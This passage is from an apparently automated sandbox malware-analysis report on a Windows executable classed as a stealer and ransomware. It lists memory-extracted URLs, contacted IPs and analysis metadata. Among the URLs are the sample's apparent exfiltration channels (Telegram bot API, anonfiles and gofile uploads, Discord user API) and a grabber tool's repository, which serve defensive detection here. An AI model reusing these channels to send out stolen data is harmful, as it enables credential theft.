                      https://github.com/Blank-c/BlankOBFprogram.exe, 00000001.00000003.1720139515.000001B5FE45D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1724687478.000001B5FE13E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1721395579.000001B5FE107000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/urllib3/urllib3/issues/29200program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://www.avito.ru/program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://api.telegram.org/botprogram.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#program.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.leboncoin.fr/program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-fileprogram.exe, 00000001.00000002.2105991946.000001B5FE050000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://tools.ietf.org/html/rfc2388#section-4.4program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64program.exe, 00000001.00000003.1713530178.000001B5FDD14000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1718315279.000001B5FDD08000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1713899896.000001B5FDD14000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1714242309.000001B5FDD18000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1718558053.000001B5FDD11000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1725898997.000001B5FDD18000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1714439286.000001B5FDD18000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1727743647.000001B5FDCB7000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1723691817.000001B5FDD15000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://weibo.com/program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107834839.000001B5FE95C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.anonfiles.com/uploadprogram.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://packaging.python.org/en/latest/specifications/entry-points/#file-formatprogram.exe, 00000001.00000002.2105991946.000001B5FE050000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.msn.comprogram.exe, 00000001.00000002.2114614682.000001B5FFA8C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1906355908.000001A84B996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1FA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908908412.000001E9B374D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://discord.com/api/v9/users/program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963program.exe, 00000001.00000002.2107071806.000001B5FE450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://cacerts.digiprogram.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://peps.python.org/pep-0205/program.exe, 00000001.00000003.1711208827.000001B5FDA11000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.reddit.com/program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1871103876.000001A83B921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908908412.000001E9B1DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameprogram.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyprogram.exe, 00000001.00000002.2107318473.000001B5FE680000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688program.exe, 00000001.00000002.2105086608.000001B5FD894000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002A.00000002.1908908412.000001E9B36F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1991968097.000001E9CA1A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1871103876.000001A83BB49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.ebay.de/program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002A.00000002.1908908412.000001E9B36F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1991968097.000001E9CA1A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeprogram.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://go.micropowershell.exe, 0000002A.00000002.1908908412.000001E9B2CB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerprogram.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.amazon.com/program.exe, 00000001.00000002.2107834839.000001B5FE8B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://github.com/python/cpython/issues/86361.program.exe, 00000001.00000003.1727613686.000001B5FDCC1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1727759704.000001B5FDD25000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105991946.000001B5FE050000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://contoso.com/Iconpowershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://httpbin.org/program.exe, 00000001.00000003.1784927173.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sprogram.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleprogram.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000044221.000001B5FF37B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000411427.000001B5FF22F000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2104205317.000001B5FE394000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2104116645.000001B5FE382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesprogram.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.ecosia.org/newtab/program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brprogram.exe, 00000001.00000003.1759907670.000001B5FE389000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759251928.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE388000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1797522496.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1754035626.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://allegro.pl/program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 0000002A.00000002.1908908412.000001E9B36F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1991968097.000001E9CA1A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535program.exe, 00000001.00000002.2105991946.000001B5FE212000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103489320.000001B5FE212000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syprogram.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://MD8.mozilla.org/1/mprogram.exe, 00000001.00000002.2110707812.000001B5FF148000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadataprogram.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107318473.000001B5FE680000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.bbc.co.uk/program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://bugzilla.moprogram.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://github.com/python/importlib_metadata/wiki/Development-Methodologyprogram.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tools.ietf.org/html/rfc6125#section-6.4.3program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1871103876.000001A83BB49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://google.com/mailprogram.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDCC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://packaging.python.org/specifications/entry-points/program.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107200618.000001B5FE560000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesprogram.exe, 00000001.00000003.2001942691.000001B5FF1DB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000411427.000001B5FF20B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.python.org/psf/license/)program.exe, 00000001.00000002.2118655051.00007FFDFB868000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyprogram.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.google.com/program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.iqiyi.com/program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://api.telegram.org/bot0program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://foss.heptapod.net/pypy/pypy/-/issues/3539program.exe, 00000001.00000002.2107071806.000001B5FE450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106525715.000001B5FE33B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE333000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE333000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2002183639.000001B5FE33B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://google.com/program.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106483905.000001B5FE310000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848103473.000001B5FE301000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFprogram.exe, 00000001.00000003.1784927173.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1797522496.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://ocsp.sectigo.com0program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://tools.ietf.org/html/rfc7231#section-4.3.6)program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsNprogram.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106483905.000001B5FE310000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848103473.000001B5FE301000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://contoso.com/Licensepowershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://discordapp.com/api/v9/users/program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceprogram.exe, 00000001.00000002.2105086608.000001B5FD894000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specprogram.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://github.com/urllib3/urllib3/issues/2920program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17program.exe, 00000001.00000003.2000044221.000001B5FF37B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000411427.000001B5FF22F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataprogram.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://yahoo.com/program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDCC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://account.bellmedia.cprogram.exe, 00000001.00000002.2114614682.000001B5FFA7C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://schemas.mic;powershell.exe, 00000008.00000002.1917964780.000001A853E10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6program.exe, 00000001.00000003.2002700653.000001B5FE1F1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103489320.000001B5FE1EA000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1850937625.000001B5FE1ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105991946.000001B5FE1F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://login.microsoftonline.comprogram.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000002.2114614682.000001B5FFA64000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://html.spec.whatwg.org/multipage/program.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106483905.000001B5FE310000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848103473.000001B5FE301000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://www.ifeng.com/program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsprogram.exe, 00000001.00000002.2107318473.000001B5FE680000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.zhihu.com/program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installprogram.exe, 00000001.00000003.2001942691.000001B5FF1DB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000411427.000001B5FF20B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchprogram.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://www.rfc-editor.org/rfc/rfc8259#section-8.1program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE333000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE333000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://contoso.com/powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://oneget.orgXpowershell.exe, 0000002A.00000002.1908908412.000001E9B3434000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://api.gofile.io/getServerprogram.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngprogram.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1906355908.000001A84B996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1FA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908908412.000001E9B374D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000002A.00000002.1908908412.000001E9B3434000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://sectigo.com/CPS0program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/program.exe, 00000001.00000003.1754035626.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE3AF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759827513.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106760693.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103757155.000001B5FE3AE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high

                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        208.95.112.1
                                                                                                                                                                                                                        		ip-api.comUnited States
                                                                                                                                                                                                                        		53334TUT-ASUSfalse
                                                                                                                                                                                                                        162.159.137.232
                                                                                                                                                                                                                        		discord.comUnited States
                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                        Analysis ID:1557107
                                                                                                                                                                                                                        Start date and time:2024-11-17 11:21:08 +01:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 13m 9s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:103
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample name:program.exe
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@164/56@2/2
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 60%
                                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 216.58.206.67
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7512 because it is empty
                                                                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 8260 because it is empty
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
